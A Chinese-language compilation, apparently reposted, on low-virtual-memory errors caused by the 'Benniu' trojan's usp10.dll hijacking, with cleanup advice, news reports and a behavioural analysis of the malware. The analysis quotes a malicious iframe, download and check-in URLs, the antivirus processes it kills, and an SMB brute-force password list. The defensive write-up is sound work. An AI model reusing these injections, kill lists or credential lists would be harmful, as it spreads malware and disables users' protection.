为什么有的电脑重装系统还会出现虚拟内存低的??--非C盘下的usp10.dll在做怪(犇牛木马)

1、感染病毒

有些病毒发作时会占用大量内存空间，导致系统出现内存不足的问题。赶快去杀毒，升级病毒库，然后把防毒措施做好!

2、虚拟内存设置不当

虚拟内存设置不当也可能导致出现内存不足问题，一般情况下，虚拟内存大小为物理内存大小的2倍即可，如果设置得过小，就会影响系统程序的正常运行。重新调整虚拟内存大小以WinXP为例，右键点击“我的电脑”，选择“属性”，然后在“高级”标签页，点击“性能”框中的“设置”按钮，切换到“高级”标签页，然后在“虚拟内存”框中点击“更改”按钮，接着重新设置虚拟内存大小，完成后重新启动系统就好了。

3、系统空间不足

虚拟内存文件默认是在系统盘中，如WinXP的虚拟内存文件名为“pagefile.sys”，如果系统盘剩余空间过小，导致虚拟内存不足，也会出现内存不足的问题。系统盘至少要保留300MB剩余空间，当然这个数值要根据用户的实际需要而定。用户尽量不要把各种应用软件安装在系统盘中，保证有足够的空间供虚拟内存文件使用，而且最好把虚拟内存文件安放到非系统盘中。

4、因为SYSTEM用户权限设置不当

基于NT内核的Windows系统启动时，SYSTEM用户会为系统创建虚拟内存文件。有些用户为了系统的安全，采用NTFS文件系统，但却取消了SYSTEM用户在系统盘“写入”和“修改”的权限，这样就无法为系统创建虚拟内存文件，运行大型程序时，也会出现内存不足的问题。问题很好解决，只要重新赋予SYSTEM用户“写入”和“修改”的权限即可，不过这个仅限于使用NTFS文件系统的用户。

虚拟内存的优化

1. 启用磁盘写入缓存

在“我的电脑”上单击鼠标右键选择“属性->硬件”，打开设备管理器找到当前正在使用的硬盘，单击鼠标右键选择属性。在硬盘属性的的“策略”页中，打开“启用磁盘上的写入缓存”。

这个选项将会激活硬盘的写入缓存，从而提高硬盘的读写速度。不过要注意一点，这个功能打开后，如果计算机突然断电可能会导致无法挽回的数据丢失。因此最好在有UPS的情况下再打开这个功能。当然，如果你平常使用计算机时不要进行什么重要的数据处理工作，没有UPS也无所谓，这个功能不会对系统造成太大的损失。

2. 打开Ultra MDA

在设备管理其中选择IDE ATA/ATAPI控制器中的“基本/次要IDE控制器”，单击鼠标右键选择“属性”，打开“高级设置”页。这里最重要的设置项目就是“传输模式”，一般应当选择“DMA（若可用）”。

3. 配置恢复选项

Windows XP 运行过程中碰到致命错误时会将内存的快照保存为一个文件，以便进行系统调试时使用，对于大多数普通用户而言，这个文件是没有什么用处的，反而会影响虚拟内存的性能。所以应当将其关闭。

在“我的电脑”上单击鼠标右键，选择“属性->高级”，在“性能”下面单击“设置”按钮，在“性能选项”中选择“高级”页。这里有一个“内存使用”选项，如果将其设置为“系统缓存”，Windows XP 将使用约4MB的物理内存作为读写硬盘的缓存，这样就可以大大提高物理内存和虚拟内存之间的数据交换速度。默认情况下，这个选项是关闭的，如果计算机的物理内存比较充足，比如256M或者更多，最好打开这个选项。但是如果物理内存比较紧张，还是应当保留默认的选项。
至于重装系统，如果真的可以通过设置虚拟内存或者杀毒之类，是系统正常运作，还是建议不要重装～
usp10.dll　usp10.dll (1.409.2600.1106)

　　包含在软件

　　名字: Windows XP Home Edition, Deutsch

　　信息链接: http://www.microsoft.com/windowsxp/

　　文件细节

　　文件道路: C:\WINDOWS\system32 \ usp10.dll

　　文件日期: 2002-08-29 14:00:00

　　版本: 1.409.2600.1106

　　文件大小: 339.456 字节

　　检查和和文件hashes

　　CRC32: 9DA76CA6

　　MD5: 06E2 217D 2AF7 50D6 69C8 AACE DD28 090B

　　SHA1: 7B9A 2876 45A6 A25B 8867 0229 49FE D6E6 816F 6A32

　　版本资源信息

　　公司名称: Microsoft Corporation

　　文件描述: Uniscribe Unicode . processor

　　文件操作系统: Windows NT, Windows 2000, Windows XP, Windows 2003

　　文件类型: Dynamic Link Library (DLL)

　　文件版本: 1.409.2600.1106

　　内部名: Uniscribe

　　法律版权: Microsoft Corporation. All rights reserved.

　　原始的文件名: Uniscribe

　　产品名称: Microsoft(R) Uniscribe Unicode . processor

　　产品版本: 1.409.2600.1106

　　用途：usp10.dll是字符显示脚本应用程序接口相关文件。也可能为病毒

　　安全等级 (0-5): 0 (N/A无危险 5最危险)

　　间谍软件: 可能

　　广告软件: 否

　　病毒: 可能

　　木马: 可能

　　系统进程: 是

　　应用程序: 否

　　后台程序: 否

　　使用访问: 否

　　访问互联网: 否

　　解决方法：

　　尝试运行"sfc /scannow"，检查一下系统文件

　　部分可能为病毒文件:

　　部分新出现的usp10.dll可能是病毒,只要他们没有出现在系统文件夹内就很有可能是病毒.其作用原理为当和该文件同一文件夹的程序运行后,usp10.dll首先发挥作用,实现上病毒网站下载木马的功能.最新的卡巴已经可以删除这种病毒.
近段时间，一种名为犇牛的木马大量爆发，该病毒用一般的方法难以清除，其威力不比机器狗差，中毒现象：系统速度明显变慢，杀毒软件莫名其妙的被卸载或禁用，下载软件（如迅雷等）失效，打开进程管理器会发现进程里面有几个数字的进程......该病毒用一般的方法不能清除，属顽固木马，大家不要浪费时间用杀毒软件盲目的去查杀，如果电脑里面文件不重要的话奉劝大家重新装下系统，文件重要的话就勉强用360的专杀工具查杀下（据我经验，效果不明显，专杀地址http://www.360.cn/killer/360compkill.html）。这里我重点提醒下大家重装系统后要做的事情：装完系统不要立即进入系统，因为该木马能在其他各个分区目录下的文件夹下生成一个名为USP10.DLL的文件，你装完系统的话立即打开盘就会马上触发木马，只要一联网该木马就会马上从网上下载大量的木马，所以装完系统最好用盘导进PE系统（没的话开机按F8进入安全模式），进入电脑后用资源管理器的形式打开“我的电脑”，然后把隐藏文件打开（工具——文件夹选项——查看——把“隐藏受保护的操作系统文件（推荐）”勾去掉把下面的显示所有文件和文件件的勾勾上，点确定），然后点搜索，在搜索栏里面填上usp10.dll，然后点搜索（不要敲回车），搜出来的文件除一个显形的usp10.dll文件保留（该文件后面注释是styem32的路径且日期和其他的不同）除这个文件外其他的全部删掉就可以了。（在病毒没清除干净之后不要联网）

usp10.dll专杀工具_剑盟出品
http://www.ttshadu.cn/SoftView/Soft11/1345.html
注意 查杀后要手动替换 ctfmon.exe 文件(注意各个系统的版本对应) 因为感染后的ctfmon.exe文件即使装了影子也会被恶意驱动穿透保留下来 而且会释放一个dll病毒在临时文件夹 隐藏选项修改不过来就是其中表现之一！结束掉被替换的ctfmon.exe程序 用程序上提供的地址下载正常版本替换过来即是！

ps：添加了baohe说的那些病毒文件库！

ps：重装系统的情况下 要先运行本软件 查杀一遍后清除残留文件 再实用别的软件 否则会优先启动病毒文件 重装就没意义了 记得要断网查杀哦！

昨日，360安全中心紧急发布信息：春节刚过，突然出现以“犇牛”为名字开头的恶性木马病毒，统称为“牛病毒”，已有湖北电脑感染，用户即使重装系统，也无济于事。 电脑中了“牛病毒”后，运行速度慢如老牛，非系统盘的根目录及所有文件夹目录中同时出现“usp10.dll”文件。部分中毒的电脑会弹出大量广告网页、杀毒软件遭强制卸载等各种病症，会自动下载大量木马病毒。用户只能将所有硬盘分区全盘格式化，否则即便重装系统后，“牛病毒”仍在。 360安全专家石晓虹博士介绍，牛病毒使用了“安软杀手”对主流杀毒软进行卸载和破坏，导致迅雷等下载软件失效。
来自360安全中心的数据显示，从2月9日开始，以释放“wsock32．dll”为主要特征之一的“犇牛”新种——“犇牛2”的单日查杀量首度超过了“犇牛”，达100万次以上，至此，“犇牛系”木马已累计感染电脑超过150万台。
　　360安全专家石晓虹博士告诉记者，“我们完全有理由相信，‘犇牛’的背后隐藏着一个组织严密、技术高超、反应迅速的木马病毒研发团伙，其目标不仅是要与安全厂商对抗，更是瞄准了3亿网民电脑中的数字财富。”
　　石晓虹提醒广大电脑用户，“犇牛”变种“犇牛2”的生命力甚至强于“熊猫烧香”病毒，目前已成为“犇牛”系主力军。360安全中心对此发出橙色木马病毒预警，并紧急推出最新版“360顽固木马专杀大全”。
　　石晓虹博士表示，依据“犇牛”目前新变种的更新速度以及破坏性，未来一段时间内，“犇牛”依然是威胁互联网安全的最大隐患。木马制作团伙随时有可能推出“犇牛”其他变种，网民千万不能掉以轻心。
　　据悉，目前已知的“犇牛”传播途径为访问挂马网页、带毒移动存储的感染以及局域网主动攻击，石晓虹提醒广大网民，必须尽快修复操作系统及第三方软件漏洞，打开安全软件的U盘防火墙后再使用U盘、数码产品等移动存储介质，并推荐使用360安全浏览器等具有防挂马功能的浏览器，避免受到“犇牛”侵袭，给自己的数据安全和虚拟财产带来损失。

犇牛对抗安全厂商　安全团队解析变种特征
犇牛是年初以来传播手段最综合的木马，传播手段与当年的“磁碟机”木马和“熊猫烧香”病毒类似，能把木马种子插入电脑中的所有html网页文件和rar压缩文件，具备了“全盘感染”的能力。

中了“犇牛”后，症状非常容易判断，特征有二：

1.电脑特别慢；

2.非系统盘下每个文件夹目录都多出来一个不正常的dll文件，经常会跳出“虚拟内存不足”的提示。用户重装系统或者用ghost系统还原都不能解决，除非全盘格式化。这是由于犇牛劫持了.dll文件，并删除了.gho镜像文件所致。

犇牛会在中招的电脑上划分势力范围，不让其它木马下载势力染指，这个不多见，由此可见木马行业内部竞争也日趋激烈。犇牛下载的木马很多都出自知名盗号工作室(五家以上)，主要是网游盗号木马。

现在犇牛的制作团队正在跟安全厂商进行一场正面对抗。目前绝大部分杀毒软件都杀不干净或被强行关闭、卸载，这一点各安全厂商论坛上都有用户的求助信息。下面就给出犇牛变种的分析报告。

犇牛变种分析报告

1、遍历全盘中的Gho、GHO、gho文件，找到就删除。 2、遍历全盘中的 jsp、php、aspx、asp、htm、html文件，找到就向文件尾部插入

<iframe src=hxxp://derek.kalengzi.cn/a.htm width=100 height=0></iframe>

进行网马传播。

3、通过 hxxp://down.skydows.cn/down.txt 这个下载列表，下载大量木马。

4、直接下载hxxp://w.ssddffgg.cn/me.exe，拷贝为c:\__default.pif，运行并进行自我更新。

5、向hxxp://w.ssddffgg.cn/7/get.asp发送本机信息，用来统计中招用户信息。

6、释放感染木马到c:\windows\ini目录下，并写入desktop.ini用来伪装成回收站。达到隐藏文件的目的。

7、遍历进行，发现下面的进程则尝试结束关闭：

rfwproxy.exe、rfwmain.exe、rfwsrv.exe、Navapsvc.exe、Navapw32.exe、EGHOST.EXE、FileDsty.exe、RavTask.exe、RavMonD.exe、UlibCfg.exe、CCenter.exe、RavMon.exe、RavLite.exe、Rav.exe、kasmain.exe、kissvc.exe、kavstart.exe、kwatch.exe、kav32.exe、360Safe.exe、avp.exe、vptray.exe、mmsk.exe、THGUARD.EXE、TrojanHunter.exe、TBSCAN.EXE、WEBSCANX.EXE、Iparmor.exe、PFW.exe、AST.exe、ast.exe、360tray.exe

8、遍历当前激活面板，如果面板父窗口含有以下关键字，则发送关闭消息关闭面板控件：

杀毒、worm、卡巴斯基、超级巡警、江民、离线升级包、金山、Anti、anti、Virus、virus、Firewall、检测、Mcafee、病毒、查杀、狙剑、防火墙、主动防御、微点、防御、系统保护、绿鹰、主动、杀马、木马、感染、清除器、上报、举 报、举报、瑞星、进 程、进程、低 安全、Process、NOD32、拦截、监控、安全卫士、监视、专杀

9、写Autorun.inf进行U盘传播。 文件写入recycle.{645FF040-5081-101B-9F08-00AA002F954E}\ini.exe，且在该目录下建了一个“safe../"的畸形文件夹，用来防止删除recycle.{645FF040-5081-101B-9F08-00AA002F954E}目录。

10、调用Windows系统函数WNetAddConnection2A来连接其它主机的Windows文件共享和远程访问端口(445)，一旦连接成功，使用以下密码字典(含空口令)尝试登录administrator账户：

movie、woaini、baby、asdf、NULL、angel、asdfgh、1314520、5201314、caonima、88888、bbbbbb、12345678、memory、abc123、qwerty、123456、111、password、new、enter、hack、xpuser、money、yeah、time、123456movie、game、user、alex、guest、admin、test、administrator、root、nn、123、xp、love、home

如果登录成功，则向目标主机各共享文件夹下写入一个kav32.exe的自身拷贝。

11、向c:\windows\ini目录下写入wsock32.dll，并将该dll复制到硬盘的每一个目录下(系统的目录除外)。

12、向c:\windows\tasks目录下写入“安装.bat”，为插入压缩包作准备。

13、遍历所有目录下的tar、cab、tgz、zip、rar文件，并调用"%ProgramFiles%"目录下的\WinRAR\Rar.exe，使用命令行参数将c:\windows\tasks\安装.bat添加到这些压缩包中。

14、修改host表，屏蔽安全厂商网站：

# ****下面是恶意网站127.0.0.0 360.qihoo.com127.0.0.1 qihoo.com127.0.0.1 www.qihoo.com127.0.0.1 www.qihoo.cn127.0.0.1 124.40.51.17127.0.0.1 58.17.236.92',0127.0.0.1 www.kaspersky.com27.0.0.1 60.210.176.251127.0.0.1 www.cnnod32.cn127.0.0.1 www.lanniao.org127.0.0.1 www.nod32club.com127.0.0.1 www.dswlab.com127.0.0.1 bbs.sucop.com127.0.0.1 www.virustotal.com127.0.0.1 tool.ikaka.com,0127.0.0.1 www.jiangmin.com203.208.37.99 www.duba.net127.0.0.1 www.eset.com.cn127.0.0.1 www.nod32.com203.208.37.99 shadu.duba.net203.208.37.99 union.kingsoft.com127.0.0.1 www.kaspersky.com.cn127.0.0.1 kaspersky.com.cn127.0.0.1 virustotal.com,0127.0.0.1 www.360.cn127.0.0.1 www.360safe.cn127.0.0.1 www.360safe.com127.0.0.1 www.chinakv.com127.0.0.1 www.rising.com.cn127.0.0.1 rising.com.cn127.0.0.1 dl.jiangmin.com127.0.0.1 jiangmin.com,0

15、删除金山通行证的记录信息，达到破坏金山毒霸升级的目的。

c:\documents and settings\all users\application data\kingsoft\kis\log.datc:\documents and settings\all users\application data\kingsoft\kis\user.dat

16、破坏安全模式及带网络的安全模式。 17、向%windir%\ini\目录下的shit.vbs写入如下内容：

On Error Resume NextSet rs=createObject("W..shell")rs.run "%windir%\ini\ini.exe",0

并调用该VBS启动ini.exe。 18、查找AfxControlBar42s窗口类，用来关闭IceSword